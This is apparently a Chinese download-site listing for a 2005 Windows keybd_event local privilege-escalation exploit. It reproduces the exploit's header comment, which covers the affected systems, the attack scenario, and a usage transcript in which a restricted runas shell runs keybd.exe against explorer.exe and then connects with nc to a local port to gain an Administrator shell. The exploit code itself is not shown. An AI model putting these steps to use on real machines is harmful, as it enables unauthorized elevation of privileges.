版权所有：
软件版本：
文件大小：4.96 K
操作系统：win9x/NT/2000/XP
下载说明： 工具来源：http://www.haxorcitos.com/MSRC-6005bgs-EN.txt zz Local privilege Escalation Exploit,No patch avaible yet /* * Microsoft Windows keybd_event validation vulnerability. * Local privilege elevation * * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com ) * I馻ki Lopez ( ilo _@_ reversing.org ) * * Platforms afected/tested: * * - Windows 2000 * - Windows XP * - Windows 2003 * * * Original Advisory: http://www.haxorcitos.com * http://www.reversing.org * * Exploit Date: 08 / 06 / 2005 * * Orignal Advisory: * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * Attack Scenario: * * a) An attacker who gains access to an unprivileged shell/application executed * with the application runas. * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP * * Impact: * * Due to an invalid keyboard input validation, its possible to send keys to any * application of the Desktop. * By sending some short-cut keys its possible to execute code and elevate privileges * getting loggued user privileges and bypass runas/service security restriction. * * Exploit usage: * * C:\>whoami * AQUARIUS\Administrador * * C:\>runas /user:restricted cmd.exe * Enter the password for restricted: * Attempting to start cmd.exe as user "AQUARIUS\restricted" ... * * * Microsoft Windows 2000 [Version.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32>cd \ * * C:\>whoami * AQUARIUS\restricted * * C:\>tlist.exe |find "explorer.exe" * 1140 explorer.exe Program Manager * * C:\>c:\keybd.exe 1140 * HANDLE Found. Attacking =) * * C:\>nc localhost 65535 * Microsoft Windows 2000 [Versi󮠵.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\>whoami * whoami * AQUARIUS\Administrador * * * DONE =) * */

【立即下载】
下载的书籍需要相应的阅读器才能查看，请到如果你的机器上没有相应的阅读器，请到 图书阅读工具 栏目中下载相关的工具。